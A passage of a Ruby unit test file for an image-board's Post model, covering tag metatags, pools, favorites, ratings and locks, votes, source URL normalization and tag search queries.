FactoryBot.create(:tag, name: "james", category: Tag.categories.character)
FactoryBot.create(:tag_alias, antecedent_name: "jim", consequent_name: "james")
@post.add_tag("jim_(cosplay)")
@post.save
assert(@post.has_tag?("james"), "expected 'jim' to be aliased to 'james'")
end
should "apply implications after the character tag is added" do
FactoryBot.create(:tag, name: "jimmy", category: Tag.categories.character)
FactoryBot.create(:tag, name: "jim", category: Tag.categories.character)
FactoryBot.create(:tag_implication, antecedent_name: "jimmy", consequent_name: "jim")
@post.add_tag("jimmy_(cosplay)")
@post.save
assert(@post.has_tag?("jim"), "expected 'jimmy' to imply 'jim'")
end
end
context "for a parent" do
setup do
@parent = FactoryBot.create(:post)
end
should "update the parent relationships for both posts" do
@post.update(tag_string: "aaa parent:#{@parent.id}")
@post.reload
@parent.reload
assert_equal(@parent.id, @post.parent_id)
assert(@parent.has_children?)
end
should "not allow self-parenting" do
@post.update(:tag_string => "parent:#{@post.id}")
assert_nil(@post.parent_id)
end
should "clear the parent with parent:none" do
@post.update(:parent_id => @parent.id)
assert_equal(@parent.id, @post.parent_id)
@post.update(:tag_string => "parent:none")
assert_nil(@post.parent_id)
end
should "clear the parent with -parent:1234" do
@post.update(:parent_id => @parent.id)
assert_equal(@parent.id, @post.parent_id)
@post.update(:tag_string => "-parent:#{@parent.id}")
assert_nil(@post.parent_id)
end
end
context "for a favgroup" do
setup do
@favgroup = FactoryBot.create(:favorite_group, creator: @user)
@post = FactoryBot.create(:post, :tag_string => "aaa favgroup:#{@favgroup.id}")
end
should "add the post to the favgroup" do
assert_equal(1, @favgroup.reload.post_count)
assert_equal(true, @favgroup.contains?(@post.id))
end
should "remove the post from the favgroup" do
@post.update(:tag_string => "-favgroup:#{@favgroup.id}")
assert_equal(0, @favgroup.reload.post_count)
assert_equal(false, @favgroup.contains?(@post.id))
end
end
context "for a pool" do
setup do
mock_pool_archive_service!
start_pool_archive_transaction
end
teardown do
rollback_pool_archive_transaction
end
context "on creation" do
setup do
@pool = FactoryBot.create(:pool)
@post = FactoryBot.create(:post, :tag_string => "aaa pool:#{@pool.id}")
end
should "add the post to the pool" do
@post.reload
@pool.reload
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "negated" do
setup do
@pool = FactoryBot.create(:pool)
@post = FactoryBot.create(:post, :tag_string => "aaa")
@post.add_pool!(@pool)
@post.tag_string = "aaa -pool:#{@pool.id}"
@post.save
end
should "remove the post from the pool" do
@post.reload
@pool.reload
assert_equal([], @pool.post_ids)
assert_equal("", @post.pool_string)
end
end
context "id" do
setup do
@pool = FactoryBot.create(:pool)
@post.update(tag_string: "aaa pool:#{@pool.id}")
end
should "add the post to the pool" do
@post.reload
@pool.reload
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "name" do
context "that exists" do
setup do
@pool = FactoryBot.create(:pool, :name => "abc")
@post.update(tag_string: "aaa pool:abc")
end
should "add the post to the pool" do
@post.reload
@pool.reload
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "that doesn't exist" do
should "create a new pool and add the post to that pool" do
@post.update(tag_string: "aaa newpool:abc")
@pool = Pool.find_by_name("abc")
@post.reload
assert_not_nil(@pool)
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "with special characters" do
should "not strip '%' from the name" do
@post.update(tag_string: "aaa newpool:ichigo_100%")
assert(Pool.exists?(name: "ichigo_100%"))
end
end
end
end
context "for a rating" do
context "that is valid" do
should "update the rating if the post is unlocked" do
@post.update(tag_string: "aaa rating:e")
@post.reload
assert_equal("e", @post.rating)
end
end
context "that is invalid" do
should "not update the rating" do
@post.update(tag_string: "aaa rating:z")
@post.reload
assert_equal("q", @post.rating)
end
end
context "that is locked" do
should "change the rating if locked in the same update" do
@post.update(tag_string: "rating:e", is_rating_locked: true)
assert(@post.valid?)
assert_equal("e", @post.reload.rating)
end
should "not change the rating if locked previously" do
@post.is_rating_locked = true
@post.save
@post.update(:tag_string => "rating:e")
assert(@post.invalid?)
assert_not_equal("e", @post.reload.rating)
end
end
end
context "for a fav" do
should "add/remove the current user to the post's favorite listing" do
@post.update(tag_string: "aaa fav:self")
assert_equal("fav:#{@user.id}", @post.fav_string)
@post.update(tag_string: "aaa -fav:self")
assert_equal("", @post.fav_string)
end
end
context "for a child" do
should "add and remove children" do
@children = FactoryBot.create_list(:post, 3, parent_id: nil)
@post.update(tag_string: "aaa child:#{@children.first.id}..#{@children.last.id}")
assert_equal(true, @post.reload.has_children?)
assert_equal(@post.id, @children[0].reload.parent_id)
assert_equal(@post.id, @children[1].reload.parent_id)
assert_equal(@post.id, @children[2].reload.parent_id)
@post.update(tag_string: "aaa -child:#{@children.first.id}")
assert_equal(true, @post.reload.has_children?)
assert_nil(@children[0].reload.parent_id)
assert_equal(@post.id, @children[1].reload.parent_id)
assert_equal(@post.id, @children[2].reload.parent_id)
@post.update(tag_string: "aaa child:none")
assert_equal(false, @post.reload.has_children?)
assert_nil(@children[0].reload.parent_id)
assert_nil(@children[1].reload.parent_id)
assert_nil(@children[2].reload.parent_id)
end
end
context "for a source" do
should "set the source with source:foo_bar_baz" do
@post.update(:tag_string => "source:foo_bar_baz")
assert_equal("foo_bar_baz", @post.source)
end
should 'set the source with source:"foo bar baz"' do
@post.update(:tag_string => 'source:"foo bar baz"')
assert_equal("foo bar baz", @post.source)
end
should 'strip the source with source:" foo bar baz "' do
@post.update(:tag_string => 'source:" foo bar baz "')
assert_equal("foo bar baz", @post.source)
end
should "clear the source with source:none" do
@post.update(:source => "foobar")
@post.update(:tag_string => "source:none")
assert_equal("", @post.source)
end
should "set the pixiv id with source:https://img18.pixiv.net/img/evazion/14901720.png" do
@post.update(:tag_string => "source:https://img18.pixiv.net/img/evazion/14901720.png")
assert_equal(14901720, @post.pixiv_id)
end
end
context "of" do
setup do
@builder = FactoryBot.create(:builder_user)
end
context "locked:notes" do
context "by a member" do
should "not lock the notes" do
@post.update(:tag_string => "locked:notes")
assert_equal(false, @post.is_note_locked)
end
end
context "by a builder" do
should "lock/unlock the notes" do
CurrentUser.scoped(@builder) do
@post.update(:tag_string => "locked:notes")
assert_equal(true, @post.is_note_locked)
@post.update(:tag_string => "-locked:notes")
assert_equal(false, @post.is_note_locked)
end
end
end
end
context "locked:rating" do
context "by a member" do
should "not lock the rating" do
@post.update(:tag_string => "locked:rating")
assert_equal(false, @post.is_rating_locked)
end
end
context "by a builder" do
should "lock/unlock the rating" do
CurrentUser.scoped(@builder) do
@post.update(:tag_string => "locked:rating")
assert_equal(true, @post.is_rating_locked)
@post.update(:tag_string => "-locked:rating")
assert_equal(false, @post.is_rating_locked)
end
end
end
end
context "locked:status" do
context "by a member" do
should "not lock the status" do
@post.update(:tag_string => "locked:status")
assert_equal(false, @post.is_status_locked)
end
end
context "by an admin" do
should "lock/unlock the status" do
CurrentUser.scoped(FactoryBot.create(:admin_user)) do
@post.update(:tag_string => "locked:status")
assert_equal(true, @post.is_status_locked)
@post.update(:tag_string => "-locked:status")
assert_equal(false, @post.is_status_locked)
end
end
end
end
end
context "of" do
setup do
@gold = FactoryBot.create(:gold_user)
end
context "upvote:self or downvote:self" do
context "by a member" do
should "not upvote the post" do
assert_raises PostVote::Error do
@post.update(:tag_string => "upvote:self")
end
assert_equal(0, @post.score)
end
should "not downvote the post" do
assert_raises PostVote::Error do
@post.update(:tag_string => "downvote:self")
end
assert_equal(0, @post.score)
end
end
context "by a gold user" do
should "upvote the post" do
CurrentUser.scoped(FactoryBot.create(:gold_user)) do
@post.update(:tag_string => "tag1 tag2 upvote:self")
assert_equal(false, @post.errors.any?)
assert_equal(1, @post.score)
end
end
should "downvote the post" do
CurrentUser.scoped(FactoryBot.create(:gold_user)) do
@post.update(:tag_string => "tag1 tag2 downvote:self")
assert_equal(false, @post.errors.any?)
assert_equal(-1, @post.score)
end
end
end
end
end
end
context "tagged with a negated tag" do
should "remove the tag if present" do
@post.update(tag_string: "aaa bbb ccc")
@post.update(tag_string: "aaa bbb ccc -bbb")
@post.reload
assert_equal("aaa ccc", @post.tag_string)
end
should "resolve aliases" do
FactoryBot.create(:tag_alias, :antecedent_name => "/tr", :consequent_name => "translation_request")
@post.update(:tag_string => "aaa translation_request -/tr")
assert_equal("aaa", @post.tag_string)
end
end
context "tagged with animated_gif or animated_png" do
should "remove the tag if not a gif or png" do
@post.update(tag_string: "tagme animated_gif")
assert_equal("tagme", @post.tag_string)
@post.update(tag_string: "tagme animated_png")
assert_equal("tagme", @post.tag_string)
end
end
should "have an array representation of its tags" do
post = FactoryBot.create(:post)
post.reload
post.set_tag_string("aaa bbb")
assert_equal(%w(aaa bbb), post.tag_array)
assert_equal(%w(tag1 tag2), post.tag_array_was)
end
context "with large dimensions" do
setup do
@post.image_width = 10_000
@post.image_height = 10
@post.tag_string = ""
@post.save
end
should "have the appropriate dimension tags added automatically" do
assert_match(/incredibly_absurdres/, @post.tag_string)
assert_match(/absurdres/, @post.tag_string)
assert_match(/highres/, @post.tag_string)
end
end
context "with a large file size" do
setup do
@post.file_size = 11.megabytes
@post.tag_string = ""
@post.save
end
should "have the appropriate file size tags added automatically" do
assert_match(/huge_filesize/, @post.tag_string)
end
end
context "with a .zip file extension" do
setup do
@post.file_ext = "zip"
@post.tag_string = ""
@post.save
end
should "have the appropriate file type tag added automatically" do
assert_match(/ugoira/, @post.tag_string)
end
end
context "with a .webm file extension" do
setup do
FactoryBot.create(:tag_implication, antecedent_name: "webm", consequent_name: "animated")
@post.file_ext = "webm"
@post.tag_string = ""
@post.save
end
should "have the appropriate file type tag added automatically" do
assert_match(/webm/, @post.tag_string)
end
should "apply implications after adding the file type tag" do
assert(@post.has_tag?("animated"), "expected 'webm' to imply 'animated'")
end
end
context "with a .swf file extension" do
setup do
@post.file_ext = "swf"
@post.tag_string = ""
@post.save
end
should "have the appropriate file type tag added automatically" do
assert_match(/flash/, @post.tag_string)
end
end
context "with *_(cosplay) tags" do
should "add the character tags and the cosplay tag" do
@post.add_tag("hakurei_reimu_(cosplay)")
@post.add_tag("hatsune_miku_(cosplay)")
@post.save
assert(@post.has_tag?("hakurei_reimu"))
assert(@post.has_tag?("hatsune_miku"))
assert(@post.has_tag?("cosplay"))
end
should "not add the _(cosplay) tag if it conflicts with an existing tag" do
create(:tag, name: "little_red_riding_hood", category: Tag.categories.copyright)
@post = create(:post, tag_string: "little_red_riding_hood_(cosplay)")
refute(@post.has_tag?("little_red_riding_hood"))
refute(@post.has_tag?("cosplay"))
assert(@post.warnings[:base].grep(/Couldn't add tag/).present?)
end
end
context "that has been updated" do
should "create a new version if it's the first version" do
assert_difference("PostArchive.count", 1) do
post = FactoryBot.create(:post)
end
end
should "create a new version if it's been over an hour since the last update" do
post = FactoryBot.create(:post)
travel(6.hours) do
assert_difference("PostArchive.count", 1) do
post.update(tag_string: "zzz")
end
end
end
should "merge with the previous version if the updater is the same user and it's been less than an hour" do
post = FactoryBot.create(:post)
assert_difference("PostArchive.count", 0) do
post.update(tag_string: "zzz")
end
assert_equal("zzz", post.versions.last.tags)
end
should "increment the updater's post_update_count" do
PostArchive.sqs_service.stubs(:merge?).returns(false)
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
# XXX in the test environment the update count gets bumped twice: and
# once by Post#post_update_count, and once by the counter cache. in
# production the counter cache doesn't bump the count, because
# versions are created on a separate server.
assert_difference("CurrentUser.user.reload.post_update_count", 2) do
post.update(tag_string: "zzz")
end
end
should "reset its tag array cache" do
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
user = FactoryBot.create(:user)
assert_equal(%w(aaa bbb ccc), post.tag_array)
post.tag_string = "ddd eee fff"
post.tag_string = "ddd eee fff"
post.save
assert_equal("ddd eee fff", post.tag_string)
assert_equal(%w(ddd eee fff), post.tag_array)
end
should "create the actual tag records" do
assert_difference("Tag.count", 3) do
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
end
end
should "update the post counts of relevant tag records" do
post1 = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
post2 = FactoryBot.create(:post, :tag_string => "bbb ccc ddd")
post3 = FactoryBot.create(:post, :tag_string => "ccc ddd eee")
assert_equal(1, Tag.find_by_name("aaa").post_count)
assert_equal(2, Tag.find_by_name("bbb").post_count)
assert_equal(3, Tag.find_by_name("ccc").post_count)
post3.reload
post3.tag_string = "xxx"
post3.save
assert_equal(1, Tag.find_by_name("aaa").post_count)
assert_equal(2, Tag.find_by_name("bbb").post_count)
assert_equal(2, Tag.find_by_name("ccc").post_count)
assert_equal(1, Tag.find_by_name("ddd").post_count)
assert_equal(0, Tag.find_by_name("eee").post_count)
assert_equal(1, Tag.find_by_name("xxx").post_count)
end
should "update its tag counts" do
artist_tag = FactoryBot.create(:artist_tag)
copyright_tag = FactoryBot.create(:copyright_tag)
general_tag = FactoryBot.create(:tag)
new_post = FactoryBot.create(:post, :tag_string => "#{artist_tag.name} #{copyright_tag.name} #{general_tag.name}")
assert_equal(1, new_post.tag_count_artist)
assert_equal(1, new_post.tag_count_copyright)
assert_equal(1, new_post.tag_count_general)
assert_equal(0, new_post.tag_count_character)
assert_equal(3, new_post.tag_count)
new_post.tag_string = "babs"
new_post.save
assert_equal(0, new_post.tag_count_artist)
assert_equal(0, new_post.tag_count_copyright)
assert_equal(1, new_post.tag_count_general)
assert_equal(0, new_post.tag_count_character)
assert_equal(1, new_post.tag_count)
end
should "merge any tag changes that were made after loading the initial set of tags part 1" do
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
# user a adds <ddd>
post_edited_by_user_a = Post.find(post.id)
post_edited_by_user_a.old_tag_string = "aaa bbb ccc"
post_edited_by_user_a.tag_string = "aaa bbb ccc ddd"
post_edited_by_user_a.save
# user b removes <ccc> adds <eee>
post_edited_by_user_b = Post.find(post.id)
post_edited_by_user_b.old_tag_string = "aaa bbb ccc"
post_edited_by_user_b.tag_string = "aaa bbb eee"
post_edited_by_user_b.save
# final should be <aaa>, <bbb>, <ddd>, <eee>
final_post = Post.find(post.id)
assert_equal(%w(aaa bbb ddd eee), Tag.scan_tags(final_post.tag_string).sort)
end
should "merge any tag changes that were made after loading the initial set of tags part 2" do
# This is the same as part 1, only the order of operations is reversed.
# The results should be the same.
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
# user a removes <ccc> adds <eee>
post_edited_by_user_a = Post.find(post.id)
post_edited_by_user_a.old_tag_string = "aaa bbb ccc"
post_edited_by_user_a.tag_string = "aaa bbb eee"
post_edited_by_user_a.save
# user b adds <ddd>
post_edited_by_user_b = Post.find(post.id)
post_edited_by_user_b.old_tag_string = "aaa bbb ccc"
post_edited_by_user_b.tag_string = "aaa bbb ccc ddd"
post_edited_by_user_b.save
# final should be <aaa>, <bbb>, <ddd>, <eee>
final_post = Post.find(post.id)
assert_equal(%w(aaa bbb ddd eee), Tag.scan_tags(final_post.tag_string).sort)
end
should "merge any parent, source, and rating changes that were made after loading the initial set" do
post = FactoryBot.create(:post, :parent => nil, :source => "", :rating => "q")
parent_post = FactoryBot.create(:post)
# user a changes rating to safe, adds parent
post_edited_by_user_a = Post.find(post.id)
post_edited_by_user_a.old_parent_id = ""
post_edited_by_user_a.old_source = ""
post_edited_by_user_a.old_rating = "q"
post_edited_by_user_a.parent_id = parent_post.id
post_edited_by_user_a.source = nil
post_edited_by_user_a.rating = "s"
post_edited_by_user_a.save
# user b adds source
post_edited_by_user_b = Post.find(post.id)
post_edited_by_user_b.old_parent_id = ""
post_edited_by_user_b.old_source = ""
post_edited_by_user_b.old_rating = "q"
post_edited_by_user_b.parent_id = nil
post_edited_by_user_b.source = "http://example.com"
post_edited_by_user_b.rating = "q"
post_edited_by_user_b.save
# final post should be rated safe and have the set parent and source
final_post = Post.find(post.id)
assert_equal(parent_post.id, final_post.parent_id)
assert_equal("http://example.com", final_post.source)
assert_equal("s", final_post.rating)
end
end
context "that has been tagged with a metatag" do
should "not include the metatag in its tag string" do
post = FactoryBot.create(:post)
post.tag_string = "aaa pool:1234 pool:test rating:s fav:bob"
post.save
assert_equal("aaa", post.tag_string)
end
end
context "with a source" do
context "that is not from pixiv" do
should "clear the pixiv id" do
@post.pixiv_id = 1234
@post.update(source: "http://fc06.deviantart.net/fs71/f/2013/295/d/7/you_are_already_dead__by_mar11co-d6rgm0e.jpg")
assert_nil(@post.pixiv_id)
@post.pixiv_id = 1234
@post.update(source: "http://pictures.hentai-foundry.com//a/AnimeFlux/219123.jpg")
assert_nil(@post.pixiv_id)
end
end
context "that is from pixiv" do
should "save the pixiv id" do
@post.update(source: "http://i1.pixiv.net/img-original/img/2014/10/02/13/51/23/46304396_p0.png")
assert_equal(46304396, @post.pixiv_id)
@post.pixiv_id = nil
end
end
should "normalize pixiv links" do
@post.update!(source: "http://i2.pixiv.net/img12/img/zenze/39749565.png")
assert_equal("https://www.pixiv.net/artworks/39749565", @post.normalized_source)
@post.update!(source: "http://i1.pixiv.net/img53/img/themare/39735353_big_p1.jpg")
assert_equal("https://www.pixiv.net/artworks/39735353", @post.normalized_source)
@post.update!(source: "http://i1.pixiv.net/c/150x150/img-master/img/2010/11/30/08/39/58/14901720_p0_master1200.jpg")
assert_equal("https://www.pixiv.net/artworks/14901720", @post.normalized_source)
@post.update!(source: "http://i1.pixiv.net/img-original/img/2010/11/30/08/39/58/14901720_p0.png")
assert_equal("https://www.pixiv.net/artworks/14901720", @post.normalized_source)
@post.update!(source: "http://i2.pixiv.net/img-zip-ugoira/img/2014/08/05/06/01/10/44524589_ugoira1920x1080.zip")
assert_equal("https://www.pixiv.net/artworks/44524589", @post.normalized_source)
end
should "normalize nicoseiga links" do
@post.source = "http://lohas.nicoseiga.jp/priv/3521156?e=1382558156&h=f2e089256abd1d453a455ec8f317a6c703e2cedf"
assert_equal("https://seiga.nicovideo.jp/seiga/im3521156", @post.normalized_source)
@post.source = "http://lohas.nicoseiga.jp/priv/b80f86c0d8591b217e7513a9e175e94e00f3c7a1/1384936074/3583893"
assert_equal("https://seiga.nicovideo.jp/seiga/im3583893", @post.normalized_source)
end
should "normalize twitpic links" do
@post.source = "http://d3j5vwomefv46c.cloudfront.net/photos/large/820960031.jpg?1384107199"
assert_equal("https://twitpic.com/dks0tb", @post.normalized_source)
end
should "normalize deviantart links" do
@post.source = "http://fc06.deviantart.net/fs71/f/2013/295/d/7/you_are_already_dead__by_mar11co-d6rgm0e.jpg"
assert_equal("https://www.deviantart.com/mar11co/art/You-Are-Already-Dead-408921710", @post.normalized_source)
@post.source = "http://fc00.deviantart.net/fs71/f/2013/337/3/5/35081351f62b432f84eaeddeb4693caf-d6wlrqs.jpg"
assert_equal("https://deviantart.com/deviation/417560500", @post.normalized_source)
end
should "normalize karabako links" do
@post.source = "http://www.karabako.net/images/karabako_38835.jpg"
assert_equal("http://www.karabako.net/post/view/38835", @post.normalized_source)
end
should "normalize twipple links" do
@post.source = "http://p.twpl.jp/show/orig/mI2c3"
assert_equal("http://p.twipple.jp/mI2c3", @post.normalized_source)
end
should "normalize hentai foundry links" do
@post.source = "http://pictures.hentai-foundry.com//a/AnimeFlux/219123.jpg"
assert_equal("https://www.hentai-foundry.com/pictures/user/AnimeFlux/219123", @post.normalized_source)
@post.source = "http://pictures.hentai-foundry.com/a/AnimeFlux/219123/Mobile-Suit-Equestria-rainbow-run.jpg"
assert_equal("https://www.hentai-foundry.com/pictures/user/AnimeFlux/219123", @post.normalized_source)
end
end
context "when validating tags" do
should "warn when creating a new general tag" do
@post.add_tag("tag")
@post.save
assert_match(/Created 1 new tag: \[\[tag\]\]/, @post.warnings.full_messages.join)
end
should "warn when adding an artist tag without an artist entry" do
@post.add_tag("artist:bkub")
@post.save
assert_match(/Artist \[\[bkub\]\] requires an artist entry./, @post.warnings.full_messages.join)
end
should "warn when a tag removal failed due to implications or automatic tags" do
ti = FactoryBot.create(:tag_implication, antecedent_name: "cat", consequent_name: "animal")
@post.reload
@post.update(old_tag_string: @post.tag_string, tag_string: "chen_(cosplay) char:chen cosplay cat animal")
@post.warnings.clear
@post.reload
@post.update(old_tag_string: @post.tag_string, tag_string: "chen_(cosplay) chen cosplay cat -cosplay")
assert_match(/\[\[animal\]\] and \[\[cosplay\]\] could not be removed./, @post.warnings.full_messages.join)
end
should "warn when a post from a known source is missing an artist tag" do
post = FactoryBot.build(:post, source: "https://www.pixiv.net/member_illust.php?mode=medium&illust_id=65985331")
post.save
assert_match(/Artist tag is required/, post.warnings.full_messages.join)
end
should "warn when missing a copyright tag" do
assert_match(/Copyright tag is required/, @post.warnings.full_messages.join)
end
should "warn when an upload doesn't have enough tags" do
post = FactoryBot.create(:post, tag_string: "tagme")
assert_match(/Uploads must have at least \d+ general tags/, post.warnings.full_messages.join)
end
end
end
end
context "Updating:" do
context "an existing post" do
setup { @post = FactoryBot.create(:post) }
should "call Tag.increment_post_counts with the correct params" do
@post.reload
Tag.expects(:increment_post_counts).once.with(["abc"])
@post.update(tag_string: "tag1 abc")
end
end
context "A rating unlocked post" do
setup { @post = FactoryBot.create(:post) }
subject { @post }
should "not allow values S, safe, derp" do
["S", "safe", "derp"].each do |rating|
subject.rating = rating
assert(!subject.valid?)
end
end
should "allow values s, q, e" do
["s", "q", "e"].each do |rating|
subject.rating = rating
assert(subject.valid?)
end
end
end
context "A rating locked post" do
setup { @post = FactoryBot.create(:post, :is_rating_locked => true) }
subject { @post }
should "not allow values S, safe, derp" do
["S", "safe", "derp"].each do |rating|
subject.rating = rating
assert(!subject.valid?)
end
end
should "not allow values s, e" do
["s", "e"].each do |rating|
subject.rating = rating
assert(!subject.valid?)
end
end
end
end
context "Favorites:" do
context "Removing a post from a user's favorites" do
setup do
@user = FactoryBot.create(:contributor_user)
@post = FactoryBot.create(:post)
@post.add_favorite!(@user)
@user.reload
end
should "decrement the user's favorite_count" do
assert_difference("@user.favorite_count", -1) do
@post.remove_favorite!(@user)
end
end
should "decrement the post's score for gold users" do
assert_difference("@post.score", -1) do
@post.remove_favorite!(@user)
end
end
should "not decrement the post's score for basic users" do
@member = FactoryBot.create(:user)
assert_no_difference("@post.score") { @post.add_favorite!(@member) }
assert_no_difference("@post.score") { @post.remove_favorite!(@member) }
end
should "not decrement the user's favorite_count if the user did not favorite the post" do
@post2 = FactoryBot.create(:post)
assert_no_difference("@user.favorite_count") do
@post2.remove_favorite!(@user)
end
end
end
context "Adding a post to a user's favorites" do
setup do
@user = FactoryBot.create(:contributor_user)
@post = FactoryBot.create(:post)
end
should "periodically clean the fav_string" do
@post.update_column(:fav_string, "fav:1 fav:1 fav:1")
@post.update_column(:fav_count, 3)
@post.stubs(:clean_fav_string?).returns(true)
@post.append_user_to_fav_string(2)
assert_equal("fav:1 fav:2", @post.fav_string)
assert_equal(2, @post.fav_count)
end
should "increment the user's favorite_count" do
assert_difference("@user.favorite_count", 1) do
@post.add_favorite!(@user)
end
end
should "increment the post's score for gold users" do
@post.add_favorite!(@user)
assert_equal(1, @post.score)
end
should "not increment the post's score for basic users" do
@member = FactoryBot.create(:user)
@post.add_favorite!(@member)
assert_equal(0, @post.score)
end
should "update the fav strings on the post" do
@post.add_favorite!(@user)
@post.reload
assert_equal("fav:#{@user.id}", @post.fav_string)
assert(Favorite.exists?(:user_id => @user.id, :post_id => @post.id))
assert_raises(Favorite::Error) { @post.add_favorite!(@user) }
@post.reload
assert_equal("fav:#{@user.id}", @post.fav_string)
assert(Favorite.exists?(:user_id => @user.id, :post_id => @post.id))
@post.remove_favorite!(@user)
@post.reload
assert_equal("", @post.fav_string)
assert(!Favorite.exists?(:user_id => @user.id, :post_id => @post.id))
@post.remove_favorite!(@user)
@post.reload
assert_equal("", @post.fav_string)
assert(!Favorite.exists?(:user_id => @user.id, :post_id => @post.id))
end
end
context "Moving favorites to a parent post" do
setup do
@parent = FactoryBot.create(:post)
@child = FactoryBot.create(:post, parent: @parent)
@user1 = FactoryBot.create(:user, enable_private_favorites: true)
@gold1 = FactoryBot.create(:gold_user)
@supervoter1 = FactoryBot.create(:user, is_super_voter: true)
@child.add_favorite!(@user1)
@child.add_favorite!(@gold1)
@child.add_favorite!(@supervoter1)
@parent.add_favorite!(@supervoter1)
@child.give_favorites_to_parent
@child.reload
@parent.reload
end
should "move the favorites" do
assert_equal(0, @child.fav_count)
assert_equal(0, @child.favorites.count)
assert_equal("", @child.fav_string)
assert_equal([], @child.favorites.pluck(:user_id))
assert_equal(3, @parent.fav_count)
assert_equal(3, @parent.favorites.count)
end
should "create a vote for each user who can vote" do
assert(@parent.votes.where(user: @gold1).exists?)
assert(@parent.votes.where(user: @supervoter1).exists?)
assert_equal(4, @parent.score)
end
end
end
context "Pools:" do
setup do
SqsService.any_instance.stubs(:send_message)
end
context "Removing a post from a pool" do
should "update the post's pool string" do
post = FactoryBot.create(:post)
pool = FactoryBot.create(:pool)
post.add_pool!(pool)
post.remove_pool!(pool)
post.reload
assert_equal("", post.pool_string)
post.remove_pool!(pool)
post.reload
assert_equal("", post.pool_string)
end
end
context "Adding a post to a pool" do
should "update the post's pool string" do
post = FactoryBot.create(:post)
pool = FactoryBot.create(:pool)
post.add_pool!(pool)
post.reload
assert_equal("pool:#{pool.id}", post.pool_string)
post.add_pool!(pool)
post.reload
assert_equal("pool:#{pool.id}", post.pool_string)
post.remove_pool!(pool)
post.reload
assert_equal("", post.pool_string)
end
end
end
context "Uploading:" do
context "Uploading a post" do
should "capture who uploaded the post" do
post = FactoryBot.create(:post)
user1 = FactoryBot.create(:user)
user2 = FactoryBot.create(:user)
user3 = FactoryBot.create(:user)
post.uploader = user1
assert_equal(user1.id, post.uploader_id)
post.uploader_id = user2.id
assert_equal(user2.id, post.uploader_id)
assert_equal(user2.id, post.uploader_id)
assert_equal(user2.name, post.uploader.name)
end
context "tag post counts" do
setup { @post = FactoryBot.build(:post) }
should "call Tag.increment_post_counts with the correct params" do
Tag.expects(:increment_post_counts).once.with(["tag1", "tag2"])
@post.save
end
end
should "increment the uploaders post_upload_count" do
assert_difference(-> { CurrentUser.user.post_upload_count }) do
post = FactoryBot.create(:post, uploader: CurrentUser.user)
CurrentUser.user.reload
end
end
end
end
context "Searching:" do
setup do
mock_pool_archive_service!
end
should "return posts for the age:<1minute tag" do
post = FactoryBot.create(:post)
assert_tag_match([post], "age:<1minute")
end
should "return posts for the age:<1minute tag when the user is in Pacific time zone" do
post = FactoryBot.create(:post)
Time.zone = "Pacific Time (US & Canada)"
assert_tag_match([post], "age:<1minute")
Time.zone = "Eastern Time (US & Canada)"
end
should "return posts for the age:<1minute tag when the user is in Tokyo time zone" do
post = FactoryBot.create(:post)
Time.zone = "Asia/Tokyo"
assert_tag_match([post], "age:<1minute")
Time.zone = "Eastern Time (US & Canada)"
end
should "return posts for the ' tag" do
post1 = FactoryBot.create(:post, :tag_string => "'")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
assert_tag_match([post1], "'")
end
should "return posts for the \\ tag" do
post1 = FactoryBot.create(:post, :tag_string => "\\")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
assert_tag_match([post1], "\\")
end
should "return posts for the ( tag" do
post1 = FactoryBot.create(:post, :tag_string => "(")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
assert_tag_match([post1], "(")
end
should "return posts for the ? tag" do
post1 = FactoryBot.create(:post, :tag_string => "?")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
assert_tag_match([post1], "?")
end
should "return posts for 1 tag" do
post1 = FactoryBot.create(:post, :tag_string => "aaa")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")
assert_tag_match([post2, post1], "aaa")
end
should "return posts for a 2 tag join" do
post1 = FactoryBot.create(:post, :tag_string => "aaa")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")
assert_tag_match([post2], "aaa bbb")
end
should "return posts for a 2 tag union" do
post1 = FactoryBot.create(:post, :tag_string => "aaa")
post2 = FactoryBot.create(:post, :tag_string => "aaab bbb")
post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")
assert_tag_match([post3, post1], "~aaa ~ccc")
end
should "return posts for 1 tag with exclusion" do
post1 = FactoryBot.create(:post, :tag_string => "aaa")
post2 = FactoryBot.create(:post, :tag_string => "aaa bbb")
post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")
assert_tag_match([post1], "aaa -bbb")
end
should "return posts for 1 tag with a pattern" do
post1 = FactoryBot.create(:post, :tag_string => "aaa")
post2 = FactoryBot.create(:post, :tag_string => "aaab bbb")
post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")
assert_tag_match([post2, post1], "a*")
end
should "return posts for 2 tags, one with a pattern" do
post1 = FactoryBot.create(:post, :tag_string => "aaa")
post2 = FactoryBot.create(:post, :tag_string => "aaab bbb")
post3 = FactoryBot.create(:post, :tag_string => "bbb ccc")
assert_tag_match([post2], "a* bbb")
end
should "return posts for the id:<N> metatag" do
posts = FactoryBot.create_list(:post, 3)
assert_tag_match([posts[1]], "id:#{posts[1].id}")
assert_tag_match([posts[2]], "id:>#{posts[1].id}")
assert_tag_match([posts[0]], "id:<#{posts[1].id}")
assert_tag_match([posts[2], posts[0]], "-id:#{posts[1].id}")
assert_tag_match([posts[2], posts[1]], "id:>=#{posts[1].id}")
assert_tag_match([posts[1], posts[0]], "id:<=#{posts[1].id}")
assert_tag_match([posts[2], posts[0]], "id:#{posts[0].id},#{posts[2].id}")
assert_tag_match(posts.reverse, "id:#{posts[0].id}..#{posts[2].id}")
end
should "return posts for the fav:<name> metatag" do
